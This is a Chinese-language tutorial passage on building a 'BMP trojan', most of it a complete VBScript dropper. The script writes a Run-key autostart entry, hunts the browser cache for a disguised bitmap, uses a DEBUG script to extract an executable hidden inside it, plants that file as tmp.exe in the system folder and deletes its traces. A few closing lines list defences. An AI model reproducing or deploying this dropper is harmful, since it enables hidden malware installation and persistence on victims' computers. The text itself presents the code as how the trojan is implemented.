該指令碼主要會在本機機器的SYSTEM目錄下產生一個「S.VBS」文件,該指令碼文件會在下次開機時自動執行。主要用於從臨時目錄中找出mybmp[1].bmp文件。
「S.VBS」文件主要內容如下:
Option Explicit
Dim FSO,WSH,CACHE,str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\快取")
wsh.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe"
SearchBMPFile fso.GetFolder(CACHE),"mybmp[1].bmp"
WScript.Quit()
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
'從臨時資料夾中搜尋目標BMP圖片
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
File.Delete
'產生一個DEBUG指令碼
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
'下面一行的1000是十六進制,換回十進制是4096(該數位是你的EXE文件的大小)
Lt.WriteLine("1000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp &"tmp.in>" & tmp & "tmp.out",false,6
On Error Resume Next
FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
FSO.GetFile(tmp & "tmp.dat").Delete
FSO.GetFile(tmp & "tmp.in").Delete
FSO.GetFile(tmp & "tmp.out").Delete
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
這個指令碼會找出在臨時資料夾中的bmp文件,並產生一個DEBUG的指令碼,執行時會自動從BMP文件54字元處讀去你指定大小的資料,並把它儲存到tmp.dat中.後面的指令碼再把它複製到SYSTEM的目錄下.這個被還原的EXE文件會在下次重新啟動的時候執行.這就是BMP木馬的基本實現程序.
詳細指令碼程式碼請參考
http://hotsky.363.net
防範方法:
最簡單,移除或改名wscrpit.exe文件和DEBUG 文件;
安裝有效的殺毒軟體,因為這些指令碼有好多殺毒軟體已經可以查出來了.
在條件允許的情況下,安裝WIN2K SP3,盡量避免去一些不名來歷的網站.